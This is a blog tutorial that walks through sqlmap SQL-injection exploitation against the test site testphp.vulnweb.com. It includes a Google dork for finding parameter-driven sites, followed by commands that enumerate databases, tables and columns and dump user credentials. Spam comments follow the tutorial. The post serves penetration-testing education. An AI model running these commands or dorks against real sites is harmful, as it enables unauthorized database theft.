Hey Folks, in this tutorial we are going to demonstrate database hacking through one of the most valuable tool called is “sqlmap“. The tutorial is designed for education purposes only where we will point you to the complete steps to acquire a web server due to the vulnerability of sql injection using the sqlmap tool.
Hmm ! But why do we use the sqlmap tool ? 🙂 ! SQL injection vulnerabilities can be detected using some well-known payloads, but exploiting the vulnerability can be complicated if you are a beginner, that’s why we use tools such as the “sqlmap” that is capable of exploiting SQL injection vulnerabilities using multiple combinations of payloads per second. sqlmap is an open source penetration testing tool that automates the process of detecting, exploiting the SQL injection vulnerability and taking over of database servers.
Keep in Mind 🙂 Usage of sqlmap for attacking targets without prior mutual consent is illegal.
Lets take a look 🙂 !!
Why SQL Injection Vulnerability Occurs?
SQL injection vulnerability comes out on top in OWASP Top 10 and even the most critical injection vulnerabilities. Injection flaws occur when a web application accepts an untrusted user supply and executes it directly in the database as a command or query. Likewise SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an any entry field for execution purposes by attacker. So there are two ways to detect and exploit SQL injection vulnerabilities.
- Detected manually by systematic set of tests.
- By using automate tools such as : SQLmap.
However, we will do the same thing in both ways, but for the manual method you should have a lot more knowledge about MySQL database statements and if you are a beginner then you should go with automated tools. In this article we will take the help of “SQLmap” automated tool to perform MySQL database hacking or penetration testing. Let’s start !!
Installation
The Sqlmap tool comes pre-installed in the Kali Linux operating system but sometimes we do not have the same operating system, so we will try to download and configure this tool separately. To configure the slqmap tool in any operating system, we must first meet the requirements of this tool. Let’s install “python2” tool first using the following command.
1 | pkg install python2 && pkg install python2 |
Now we’ll download the sqlmap tool by using the git command, after downloading is done then we will go to the directory and boot this tool by using the python script.
1 2 3 | git clone https://github.com/sqlmapproject/sqlmap.git cd sqlmap python2 sqlmap.py |
Upgrade Sqlmap Tool
As we know it comes pre-installed in Kali Linux operating system but sometimes we forget to upgrade the installed tool, hence we can upgrade our sqlmap tool using the following command.
1 | apt-get upgrade sqlmap |
Featurs of SQLmap Tool
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB and FrontBase database management systems.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
Likewise you can read complete features of this tool from here 🙂 !!
Google Dork
Google Dorks useful for passive information gathering purposes. This is the best way to reconnaissance about the target website even the target site doesn’t know about our reconnaissance. We donot have any vulnerable website where we can perform SQL injection 💉 hence we will take help of google dork. We will try to find the vulnerability in web application through “cat” parameter. But the question is, why do we choose the parameter itself to test or exploit the SQL injection vulnerability ? Ok !! Originally the parameter is also known by the alias of the query strings and according to Google it is a way of passing information to the server through a URL, that’s why attackers takes help of parameter’s to insert their malicious SQL statements directly into the database. You choose any parameter according to you and change it in the given google dork and do a search on google.
1 | inurl:".php?cat=" inurl:" |
Google gives many websites in which the “cat” parameter is being used to show the content of web pages or different-2 purposes. We choose the following website and as soon as we add single quote after “?cat=” parameter we get an MySQL syntax error which means the site is vulnerable to the SQL injection vulnerability.
1 | http://testphp.vulnweb.com/listproducts.php?cat=1' |
Thus, we can try to identify SQL injection vulnerabilities by deploying a separate -2 meta character. It is now discovered that the website is insecure and we will get data from the database using the sqlmap tool.
1 | http://testphp.vulnweb.com/listproducts.php?cat=1"" |
Database
Our first objective will be to dump the entire database from the web server. Check the command below in which the “U” parameter has been used to give the exact location of the SQL injection vulnerability found in the website. The “dbs” parameter is being used to dump the names of the database.
Usage 🙂 !! sqlmap -u “<URL>>” –dbs
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs |
Great 🙂 !! Sqlmap has successfully detected the SQL injection vulnerability which results in us getting the database name which is available in the web application.
We want to erase a question in your mind related to batch commands. SQLMap may ask us to provide input during the scan, hence we use this feature to discard everything after which it do all these tasks ourselves.
Usage 🙂 !! sqlmap -u “<URL>>” –dbs –batch
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch |
As you can see the two databases are built into the web application database server.
Tables
As we know that an SQL database contains multiple objects such as tables. So we will select one of the two databases and try to dump the names of the tables present in the database using the following command. “-D” used for database name.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > –tables
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables |
Great 🙂 !! We get what we thought ! As you can see after executing the above we got the name of the tables present in the web application database.
Columns
In a relational database, a column is a set of data values in which contain text values, numbers, email and passwords. Now you can select any one table you want to dump but in our case we will select the “users” table to get sensitive information from the database.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > -T < tables name > –columns
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns |
Alright 🙂 !! We are going the right way and as you can see we have successfully dumped all the columns using the above command. Now we have all the sensitive files in front of us, let’s try to dump them.
Dump Columns
The wait is over now and we will first dump the email address files from the database. Just add the column name to the command and dump the file.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > -T < tables name > -C < columns name > –dump
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C email --dump |
YEHE 🙂 !! You can see that we have found an email address in the files which is not enough. So let’s try to dump the whole table.
Dump Particular Table
As you see, dumping the tables one by one and then their columns will be a very long process, hence we will dump the entire table at once by adding the “dump” parameter after the table.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > -T < tables name > –dump –batch
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --dump --batch |
Amazing 🙂 !! Finally we get sensitive credentials of users after dumping entire “user” tables and thus we have successfully hacked the back end database of the web application by using the sqlmap tool.
Dump All Tables
This tool has another feature through which we can dump the number of multiple tables at once. Let’s try it also. Just after selecting any database you need to add “--dump-all” feature.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > –dump-all –batch
1 | sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart ---dump-all --batch |
Done 🙂 !! We cannot show all the results due to maximum size of screenshot but you can see that all the tables, columns and data are dumped at once as soon as the above command is executed.
As you have seen how attackers steal and hack data with the help of these tools due to SQL injection vulnerability in web application.
Keep in Mind 🙂 Usage of sqlmap for attacking targets without prior mutual consent is illegal and this tutorial is made for educational purposes.
Credit : wikipedia.org & sqlmap.org
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
I all the time used to study article in news papers but now as I am a user of net so from now I am using net for articles or reviews, thanks to web.
Thanks 🙂 !!
I love reading this web content. Very useful for me. Thank you.
I love reading this web content. Very useful for me. Thank you.
When someone writes an post he/she retains the plan of a user in his/her
mind that how a user can know it. Thus that’s why this article is
amazing. Thanks!
Woԝ, incredible blog layout! How long have you been ƅlogging for?
yoᥙ make blogging lοok easy. The overall look of yоur ᴡebsite is excellent, as wеll as
thе c᧐ntent!
Its like you read my thoughts! You appear to grasp so much approximately this, like you wrote the guide in it or something.
I think that you could do with a few % to power the message
home a little bit, however instead of that, that is excellent blog.
A great read. I’ll certainly be back.
Combines agility & elasticity with fast deployment & distribution inside your data center, to benefit from full-featured Oracle Cloud solutions with the new Oracle Cloud at Customer Gen 2 delivered by Logika IT Solutions.
Thank you for the auspicious writeup. It in fact was a amusement account
it. Look advanced to far added agreeable from you! By the way, how can we
communicate?
Right here is the right site for anybody who hopes to find out about
this topic. You understand a whole lot its almost
hard to argue with you (not that I personally would want to…HaHa).
You definitely put a new spin on a subject that’s been discussed for
a long time. Excellent stuff, just excellent!
Great weblog right here! Also your site quite a bit up fast!
What web host are you the use of? Can I get
your associate link in your host? I want my web site loaded up as
fast as yours lol
Thanks for your valuable feedback 🙂 !!
hi!,I like your writing so a lot! percentage we keep up a correspondence more approximately your
post on AOL? I require an expert in this house to resolve my problem.
May be that is you! Looking forward to peer you.
Thanks for your valubale feedback 🙂 !!
You don’t know all there is to know about Marketing and advertising.
Affiliate marketing is about the best ways commence an online business model.
It doesn’t have to do anything else but have a message.
There are many article directories on the field of Wide On the web.
Again, she can be a person who reads, writes, leaves
comments and extremely helpful to others. Put up a web site and they
will come, suited?
You are so awesome! I don’t believe I’ve truly read through a single thing like that before. So wonderful to discover someone with some genuine thoughts on this topic. Really.. thanks for starting this up. This site is something that is required on the internet, someone with a bit of originality!
Hi! Would you mind if I share your blog with my zynga group?
There’s a lot of people that I think would really enjoy your content.
Please let me know. Thanks
Sure please 🙂 !!